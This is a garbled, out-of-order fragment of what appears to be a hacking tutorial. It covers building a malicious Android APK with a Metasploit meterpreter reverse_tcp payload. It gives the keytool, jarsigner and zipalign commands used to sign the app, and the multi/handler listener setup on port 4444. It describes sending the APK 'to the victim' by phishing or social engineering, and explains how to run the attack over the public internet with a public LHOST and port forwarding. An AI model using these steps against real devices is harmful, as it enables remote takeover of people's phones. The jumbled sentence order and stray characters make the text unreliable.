Note: Android x86 project can connect it to a local network with an Ethernet adapter (VMnet8). Finish the process and run the machine in LIVE mode.Create a virtual machine using another version 2.6x kernel in the VMware workstation.
apk to the victim with the help of social engineering/email phishing. In our environment, we are using an Android device version 8.1 (Oreo). Next, we need to install the malicious Android. Then we can successfully run the exploit to listen for the reverse connection. We have used localhost IP, port number 4444 and payload android/meterpreter/reverse_tcp while creating an. Next, set the options for payload, listener IP (LHOST) and listener PORT(LPORT). Now launch the exploit multi/handler and use the Android payload to listen to the clients. Step 2: is to set up the listener on the Kali Linux machine with multi/handler payload using Metasploit.įigure 10: Display Metasploit start screen
Our new filename is singed_jar.apk after the verification with Zipalign.įigure 8: Malicious. Now we have signed our android_shell.apk file successfully and it can be run on any Android environment. Terminal: zipalign -v 4 android_shell.apk singed_jar.apkįigure 7: Verifying the. Zipalign is not preinstalled in Kali Linux, so you will have to install it first. Terminal: jarsigner -verify -verbose -certs android_shell.apkįigure 5: Verifying the. Terminal: jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore android_shell.apk hackedįigure 4: Signing a. Terminal: keytool -genkey -V -keystore key.keystore -alias hacked -keyalg RSA -keysize 2048 -validity 10000 apk file, we need to sign a certificate because Android mobile devices are not allowed to install apps without the appropriately signed certificate. To perform in the public network, you should enter your public address in LHOST and enable port forwarding on the router.Īfter this command, now you can locate your file on the desktop with the name android_shell.apk.Īfter we successfully created the.
Note: In this command, we have used the local address because we are demonstrating in the local environment.